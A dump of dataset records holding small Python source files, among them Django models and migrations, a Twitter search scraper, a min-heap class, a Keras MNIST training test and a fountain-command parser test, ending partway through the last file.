blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8f0d1c6f1c3a8f8d9e42acba2344603fcafe173d | dc3d310934705034ab2f5bc4d3a96f07dab9b48b | /about_orm/app01/models.py | eb0e65d0120790442bd0561e2021c0df7c9e6ab5 | [] | no_license | createnewdemo/istudy_test | 82197488d9e9fa05e0c6cc91362645fc4555dc1d | 806693f2bee13e3c28571d0d75f6b6ea70acf7a0 | refs/heads/master | 2022-04-19T05:52:53.780973 | 2020-04-17T17:04:10 | 2020-04-17T17:04:10 | 256,507,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | from django.db import models
# Create your models here.
class Person(models.Model):
pid = models.AutoField(primary_key=True)
name = models.CharField(db_column='nick',max_length=32,blank=True,null=True) #char
age = models.IntegerField()
birth = models.DateTimeField(auto_now=True)# 新增数据是自动保存
#auto_now_add=True 新增数据时自动保存当前的时间
#auto_now=True 新增和编辑 数据时自动保存当前的时间
class Meta:
# 数据库中生成的表名称 默认 app名称 + 下划线 + 类名
db_table = "Person"
# admin中显示的表名称
verbose_name = '个人信息'
# verbose_name加s
verbose_name_plural = '所有用户信息'
# # 联合索引
# index_together = [
# ("name", "age"), # 应为两个存在的字段
# ]
#
# # 联合唯一索引
# unique_together = (("name", "age"),) # 应为两个存在的字段
def __str__(self):
return "{}-{}".format(self.name,self.age)
class Publisher(models.Model):
name = models.CharField(max_length=32,verbose_name='出版社名称')
def __str__(self):
return "<Publisher object:{}-{}>".format(self.pk,self.name)
class Book(models.Model):
name = models.CharField(max_length=32,verbose_name='书名')
pub = models.ForeignKey(Publisher,on_delete=models.CASCADE,related_name='books',related_query_name='book')
price = models.DecimalField(max_digits=5,decimal_places=2) #999.99
sale = models.IntegerField()
repertory = models.IntegerField()#库存
def __str__(self):
return "<Book object:{}-{}>".format(self.pk,self.name)
class Author(models.Model):
name = models.CharField(max_length=32,verbose_name='姓名')
books = models.ManyToManyField('Book',related_name='authors')
def __str__(self):
return "<Author object:{}-{}>".format(self.pk,self.name)
| [
"320783214@qq.com"
] | 320783214@qq.com |
8f96c48c1e4bd9530d879ca2c31181ad9a56ae83 | 6e9f3e81af3ab66b10f8602544695ad9b035ffa5 | /jcoin/scripts/make-account.py | b95b671a8d4502546c79277eb6056937b88e1bef | [
"MIT"
] | permissive | slice/jose | 5ca7074e326e5fcffe7a1abfef249160644faa7c | 13e39b958f58fd024b3ba5b7ccd0a1cd7f02f14c | refs/heads/master | 2021-05-04T22:48:09.804518 | 2018-03-06T02:18:47 | 2018-03-06T02:18:47 | 99,070,186 | 0 | 0 | null | 2017-08-02T03:55:23 | 2017-08-02T03:55:23 | null | UTF-8 | Python | false | false | 198 | py | import requests
def main():
r = requests.post('http://0.0.0.0:8080/api/wallets/162819866682851329', json={
'type': 0,
})
print(r)
if __name__ == '__main__':
main()
| [
"lkmnds@gmail.com"
] | lkmnds@gmail.com |
ed2479409cc4d9b6931d821c5efacab31c8578a8 | 41fa2097f9037047ecb350f5b3efc30bc05f17e0 | /spiketoolkit/version.py | 5434119352b07fd912ca872cfaf3efdf17bfd578 | [
"MIT"
] | permissive | Shawn-Guo-CN/spiketoolkit | 7a670488b4a3009b7b410d4e172f9e547cee9566 | 11e60f3cd80c135c62e27538a4e141115a7e27ad | refs/heads/master | 2020-07-27T09:38:51.337170 | 2019-11-13T14:56:17 | 2019-11-13T14:56:17 | 209,047,879 | 0 | 0 | MIT | 2019-11-13T12:20:59 | 2019-09-17T12:28:09 | Python | UTF-8 | Python | false | false | 18 | py | version = '0.5.0'
| [
"alejoe9187@gmail.com"
] | alejoe9187@gmail.com |
4df461452801f2faf135f7c05f95ba61cea06067 | 9c6decc65c5dc7aed3aff66405cdafa3a750d8a5 | /Problem001-100/001 Multiples of 3 and 5.py | 7bd80a9209855897b4d5ae1373916f32144db95b | [] | no_license | Anfany/Project-Euler-by-Python3 | 9374a6a112843f03f7cda6b689a8fd7db7914a9d | 385e2c1c02b5e81111e054c3807911defde2dc29 | refs/heads/master | 2021-04-06T00:48:03.603738 | 2019-04-18T02:35:02 | 2019-04-18T02:35:02 | 124,505,893 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | #!/usr/bin/python3.5
# -*- coding: UTF-8 -*-
#Author: AnFany
# Problem001 Multiples of 3 and 5
an=sum([i for i in range(1,1000) if i%3==0 or i%5==0])
print(an)
#答案:233168
| [
"noreply@github.com"
] | Anfany.noreply@github.com |
01219c0d59a45dc07bc0fe122f4f98a0001c725f | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/physical/migrations/0012_auto__add_field_instance_status.py | 5e0c49703a3e5ac93acc5e802ce304b2ae2c9ef9 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,471 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Instance.status'
db.add_column(u'physical_instance', 'status',
self.gf('django.db.models.fields.IntegerField')(default=2),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Instance.status'
db.delete_column(u'physical_instance', 'status')
models = {
u'physical.databaseinfra': {
'Meta': {'object_name': 'DatabaseInfra'},
'capacity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'endpoint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'endpoint_dns': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'engine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Engine']"}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '406', 'blank': 'True'}),
'per_database_size_mbytes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'physical.engine': {
'Meta': {'unique_together': "((u'version', u'engine_type'),)", 'object_name': 'Engine'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'engines'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.EngineType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user_data_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'physical.enginetype': {
'Meta': {'object_name': 'EngineType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.environment': {
'Meta': {'object_name': 'Environment'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.instance': {
'Meta': {'unique_together': "((u'address', u'port'),)", 'object_name': 'Instance'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'databaseinfra': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'instances'", 'to': u"orm['physical.DatabaseInfra']"}),
'dns': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'hostname': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_arbiter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.plan': {
'Meta': {'object_name': 'Plan'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plans'", 'to': u"orm['physical.EngineType']"}),
'environments': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['physical.Environment']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_ha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'max_db_size': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'provider': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.planattribute': {
'Meta': {'object_name': 'PlanAttribute'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plan_attributes'", 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['physical'] | [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
7355cb8b618bc1bf927c25c2ad8f74d161bec0bb | 6bf19501437a419bfb0b891a1ac55b52ab833b97 | /apps/master/actors/chat.py | c391adc38b6c2b7c8daffee794dcb38e1e27239d | [
"Apache-2.0"
] | permissive | jdelrue/digital_me | 330351edbfa5ffb931f5f0592c5738432c2eaa88 | 5e4699a3c94088fa089e0c1fefab9955cd6bd927 | refs/heads/master | 2020-04-07T16:56:53.703863 | 2018-07-31T13:08:30 | 2018-07-31T13:08:30 | 158,549,943 | 0 | 0 | NOASSERTION | 2018-11-21T13:11:28 | 2018-11-21T13:11:28 | null | UTF-8 | Python | false | false | 1,075 | py | from jumpscale import j
#BE CAREFUL MASTER IS IN: /code/github/threefoldtech/jumpscale_lib/JumpscaleLib/servers/gedis/base/actors/chat.py
JSBASE = j.application.jsbase_get_class()
class chat(JSBASE):
"""
"""
def __init__(self):
JSBASE.__init__(self)
self.chatbot = j.servers.gedis.latest.chatbot
#check self.chatbot.chatflows for the existing chatflows
#all required commands are here
def work_get(self, sessionid,schema_out):
"""
```in
sessionid = "" (S)
```
```out
cat = "" (S)
msg = "" (S)
```
"""
cat,msg = self.chatbot.session_work_get(sessionid)
return {"cat":cat,"msg":msg}
def work_report(self, sessionid, result):
"""
```in
sessionid = "" (S)
result = "" (S)
```
```out
```
"""
self.chatbot.session_work_set(sessionid,result)
def session_alive(self,sessionid,schema_out):
#TODO:*1 check if greenlet is alive
pass
| [
"kristof@incubaid.com"
] | kristof@incubaid.com |
51242aad84f877f6312483b22294f379050c32d6 | c8a7ccfb42628d1100562a053c4334488e1bf239 | /shell_cartesian_product.py | 6fa93aafa24d0d97ef46b832a619ec80dfc50343 | [
"CC0-1.0"
] | permissive | LyricLy/python-snippets | 8487619a916e33e02b5772aba577d9dafdfd803b | 9d868b7bbccd793ea1dc513f51290963584a1dee | refs/heads/master | 2020-04-08T01:57:22.511167 | 2018-11-24T08:12:20 | 2018-11-24T08:12:20 | 158,916,096 | 1 | 0 | CC0-1.0 | 2018-11-24T08:16:59 | 2018-11-24T08:16:59 | null | UTF-8 | Python | false | false | 624 | py | #!/usr/bin/env python3
# encoding: utf-8
import re as _re
def expand(str) -> (str, str):
"""expand a string containing one non-nested cartesian product strings into two strings
>>> expand('foo{bar,baz}')
('foobar', 'foobaz')
>>> expand('{old,new}')
('old', 'new')
>>> expand('uninteresting')
'uninteresting'
"""
match = _re.search(r'{([^{}]*),([^{}]*)}', str)
if match is None:
return str
return (
str[:match.start()] + match.group(1) + str[match.end():],
str[:match.start()] + match.group(2) + str[match.end():]
)
def _test():
import doctest
doctest.testmod()
if __name__ == '__main__':
_test()
| [
"bmintz@protonmail.com"
] | bmintz@protonmail.com |
c7efb64ec9be875434887caa7539ac4f76f26d5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02398/s216293399.py | f27ba33161028edb6af38fe51bdbad406e51b2e2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from sys import stdin
a, b, c = [int(x) for x in stdin.readline().rstrip().split()]
print(len([x for x in range(a, b+1) if c % x == 0]))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
bc5a5fe7fe9489e01e90443f9ac694caba89f548 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02681/s356994323.py | 1a9332ce96290a7bc4f73232250e7871b5299d84 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | S = input()
T = input()
S = S + T[-1]
if S == T:
ans = 'Yes'
else:
ans = 'No'
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5bed01a254bd62b699ed700ae1d181c947b9b35a | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/B/buttub/basic_twitter_scraper_210.py | 9d1bd12d5fb4a5b4529a86e87666c11c1e6b964c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | ###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7d254cf76a88c8dfee2d600c08809f29ae21763e | d7e131777d76b98d76cc3a37f96313282b1ad69c | /functions.py | 856222fe9fdc0a66c0ab04d04595eca664c857c5 | [] | no_license | prashararchi/spy-chat | bd7e71bbcb627c075e196f1c487d8039ac843db4 | 9d2cb9a81f78ac7afc08642d6669988d3ee67500 | refs/heads/master | 2020-12-02T22:10:09.834229 | 2017-07-03T10:04:17 | 2017-07-03T10:04:17 | 96,092,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | from spy_details import*
from steganography.steganography import Steganography
from colorama import init,Fore,Style
from datetime import datetime
#reading chat_history
def read_chat_history():
read_for = select_friend()
for chat in friends[read_for].chats:
if chat.sent_by_me:
init(autoreset=True)
msg_chat=Fore.BLUE+chat.time.strftime("%d %b %y")
print '[%s] %s: %s' %(msg_chat ,'You said:' ,chat.message)
else:
print '[%s] %s said: %s' % (msg_chat, friends[read_for].name, chat.message)
#starting chat
def start_chat(user):
result = True
while result:
choice = menu_choices()
# checking the choices.
if (choice == 1):
add_status()
elif(choice == 2):
add_friend()
elif(choice == 3):
send_message()
elif(choice == 4):
read_message()
elif(choice == 5):
read_chat_history()
elif(choice == 6):
result = False
else:
print ("Wrong choice.Sorry you are not of the correct age to be a spy")
#introducing menu_choice
def menu_choices():
print("1. Add a status")
print("2. Add a friend")
print("3. Send a secret message")
print("4. Receive/Read secret message")
print("5. Read chat History")
print("6. Exit Application.")
choice = int(raw_input("Enter your choice: "))
# return choice
return choice
#adding status
def add_status():
all_status = ['available', 'sleeping', 'at work']
choice = int(raw_input("press 1 to add new status or press other key to add other status"))
if choice == 1:
current_status = raw_input("enter new status")
all_status.append(current_status)
else:
count = 1
for temp in all_status:
print("%d %s" % (count, temp))
count += 1
choose = int(raw_input("which status you want?"))
current_status = all_status[choose - 1]
#adding friend
def add_friend():
new_friend = Spy('','',0,0.0)
new_friend.name = raw_input("enter friends name")
new_friend.salutation = raw_input("enter mr or ms")
new_friend.age =int(raw_input("enter age"))
new_friend.rating = float(raw_input("enter rating"))
if len(new_friend.name) > 0 and new_friend.age > 12 :
friends.append(new_friend)
else:
print 'Invalid entry. We cant add spy with the details you provided'
return len(friends)
#selecting friend
def select_friend():
item = 0
for friend in friends:
print (friend.name, friend.age,friend.rating)
item = item + 1
#selecting friends.
friend_choice = int(raw_input("choose: "))
frnd = int(friend_choice) - 1
return friend_choice
#sending message
def send_message():
friend_choice = select_friend()
original_image='nature.jpg'
output_path ='output.jpg'
#its secret message
text = 'YOO I DID IT.FINALLY I AM FEELING GOOD'
Steganography.encode(original_image,output_path,text)
new_chat = chat_message(text , True)
friends[friend_choice].chats.append(new_chat)
print ("Your secret message is ready")
send_message()
#reading message
def read_message():
sender = select_friend()
output_path =("output.jpg")
get = Steganography.decode(output_path)
print get
new_chat = chat_message( get,False)
friends[sender].chats.append(new_chat)
print("your message has been sent")
read_message()
| [
"="
] | = |
a78dbd6d284e4a6f01a1019211971bc9c0c8c61b | 0d942316070509955bad7ee774ac417e5c7b1235 | /datastructures/minheap.py | 34ab3809f1483e9783635f1a0761b4eb078ad011 | [] | no_license | rlavanya9/hackerrank | 4750ad48d5d249f1d58e6eff205e585f17e6a78b | 64e6686df62c1f1cdaa7dfb6d0c4525d236c197b | refs/heads/master | 2023-03-24T15:50:41.616353 | 2021-03-19T17:26:54 | 2021-03-19T17:26:54 | 349,502,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
Min Heap Implementation in Python
"""
class MinHeap:
def __init__(self):
"""
On this implementation the heap list is initialized with a value
"""
self.heap_list = [0]
self.current_size = 0
def sift_up(self, i):
"""
Moves the value up in the tree to maintain the heap property.
"""
# While the element is not the root or the left element
while i // 2 > 0:
# If the element is less than its parent swap the elements
if self.heap_list[i] < self.heap_list[i // 2]:
self.heap_list[i], self.heap_list[i // 2] = self.heap_list[i // 2], self.heap_list[i]
# Move the index to the parent to keep the properties
i = i // 2
def insert(self, k):
"""
Inserts a value into the heap
"""
# Append the element to the heap
self.heap_list.append(k)
# Increase the size of the heap.
self.current_size += 1
# Move the element to its position from bottom to the top
self.sift_up(self.current_size)
def sift_down(self, i):
# if the current node has at least one child
while (i * 2) <= self.current_size:
# Get the index of the min child of the current node
mc = self.min_child(i)
# Swap the values of the current element is greater than its min child
if self.heap_list[i] > self.heap_list[mc]:
self.heap_list[i], self.heap_list[mc] = self.heap_list[mc], self.heap_list[i]
i = mc
def min_child(self, i):
# If the current node has only one child, return the index of the unique child
if (i * 2)+1 > self.current_size:
return i * 2
else:
# Herein the current node has two children
# Return the index of the min child according to their values
if self.heap_list[i*2] < self.heap_list[(i*2)+1]:
return i * 2
else:
return (i * 2) + 1
def delete_min(self):
# Equal to 1 since the heap list was initialized with a value
if len(self.heap_list) == 1:
return 'Empty heap'
# Get root of the heap (The min value of the heap)
root = self.heap_list[1]
# Move the last value of the heap to the root
self.heap_list[1] = self.heap_list[self.current_size]
# Pop the last value since a copy was set on the root
*self.heap_list, _ = self.heap_list
# Decrease the size of the heap
self.current_size -= 1
# Move down the root (value at index 1) to keep the heap property
self.sift_down(1)
# Return the min value of the heap
return root
"""
Driver program
"""
# Same tree as above example.
my_heap = MinHeap()
my_heap.insert(5)
my_heap.insert(6)
my_heap.insert(7)
my_heap.insert(9)
my_heap.insert(13)
my_heap.insert(11)
my_heap.insert(10)
print(my_heap.delete_min()) # removing min node i.e 5 | [
"rangaswamy.lavanya@gmail.com"
] | rangaswamy.lavanya@gmail.com |
cd3e76b86f9d33e10b10335157e5d340ce734962 | 0fdc732fcdad1c0d76d6ec80cb6e25b6ec17d6e1 | /generic_views/display_views/models.py | 09bf2b21330b7de58380a241d44bb9f07e61cb04 | [
"MIT"
] | permissive | markbirds/Django-Code-Repo | 9b3c8bfba948dd8ea1be71e31cbfd2ef26bfa157 | b55762d2dab00640acf2e8e00ddc66716d53c6b5 | refs/heads/master | 2023-01-05T22:44:16.405853 | 2020-11-03T07:17:50 | 2020-11-03T07:17:50 | 299,615,438 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | import uuid
from django.db import models
class DisplayViewModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(unique=True,max_length=50)
age = models.IntegerField()
def get_absolute_url(self):
from django.urls import reverse
return reverse('display_views:detail_view', args=[str(self.id)])
def __str__(self):
return f'{self.name} - {self.id}'
| [
"fowenpatrick@gmail.com"
] | fowenpatrick@gmail.com |
b6edf643e623372579197f494e3f4691341ddcb7 | 4d56399b01d06946024822edcdf2b45bbc1dfe8f | /tests/app/TestMnistFlow.py | 8f88a7e2bb5e318f3bfeb41e1b6c8a2ca68253c7 | [] | no_license | fletch22/nba_win_predictor | 961b520b50cd5bebceb8c5d2bc91bc0dc71715ef | aff78780aca8a54c22e904cdcdee569278d4f5fc | refs/heads/master | 2023-08-11T02:44:22.613419 | 2020-04-09T21:32:38 | 2020-04-09T21:32:38 | 181,233,092 | 0 | 0 | null | 2021-08-25T14:57:49 | 2019-04-13T22:01:58 | Python | UTF-8 | Python | false | false | 2,443 | py | import warnings
from app.models.mnist_pretrained import get_vgg16_for_mnist
warnings.filterwarnings('ignore')
import os
from unittest import TestCase
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Flatten, Dense
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
from app.config import config
dimension = 44
img_width, img_height = dimension, dimension
train_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'train')
validation_data_dir = os.path.join(config.DATA_FOLDER_PATH, 'mnist', 'test')
train_samples = 60000
validation_samples = 10000
epoch = 30
batch_size = 32
class TestMnistFlow(TestCase):
def get_model_simple(self):
model = Sequential()
model.add(Convolution2D(16, 5, 5, activation='relu', input_shape=(img_width, img_height, 3)))
model.add(MaxPooling2D(2, 2))
model.add(Convolution2D(32, 5, 5, activation='relu'))
model.add(MaxPooling2D(2, 2))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(10, activation='softmax'))
# ** Model Ends **
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
return model
def test_flow(self):
# ** Model Begins **
model = get_vgg16_for_mnist((dimension, dimension, 3), 10)
# model = self.get_model_simple()
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='categorical')
model.fit_generator(
train_generator,
samples_per_epoch=train_generator.n,
nb_epoch=epoch,
validation_data=validation_generator,
nb_val_samples=validation_samples, workers=12)
# model.save_weights('mnistneuralnet.h5')
| [
"chris@fletch22.com"
] | chris@fletch22.com |
a4fd68b0396381878daf049a641dec0c58de016d | c5cb9d60da5bab94ccf4dfb28185315521cc2736 | /tests/fountain/test_program.py | 7edc24568ab6f69d4fee090c0a2202d98ada73c7 | [] | no_license | Let-it-Fountain/code-generator | 4aa93ed7688e064d727619f68c902823b5c99e4e | 25560af09d008d5501eb4f68e8db5bb2aeaa8461 | refs/heads/master | 2016-08-12T18:43:30.896931 | 2016-01-07T20:16:02 | 2016-01-07T20:38:42 | 49,221,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | import unittest
from fountain.command import ChangeNozzlePressureAndColorFountainCommand
from fountain.program import FountainProgram
class TestFountainProgram(unittest.TestCase):
def test_parse_json(self):
json = """{
"version": 1,
"commands": [
{
"nozzle": 1,
"pressure": 42,
"color": "green",
"time": 5
},
{
"nozzle": 2,
"pressure": 3.14,
"color": "red",
"time": 2
},
{
"nozzle": 5,
"pressure": 0,
"color": "yellow",
"time": 10
}
]
}"""
program = FountainProgram.parse_json(json)
self.assertListEqual([ChangeNozzlePressureAndColorFountainCommand(1, 42, 'green', 5),
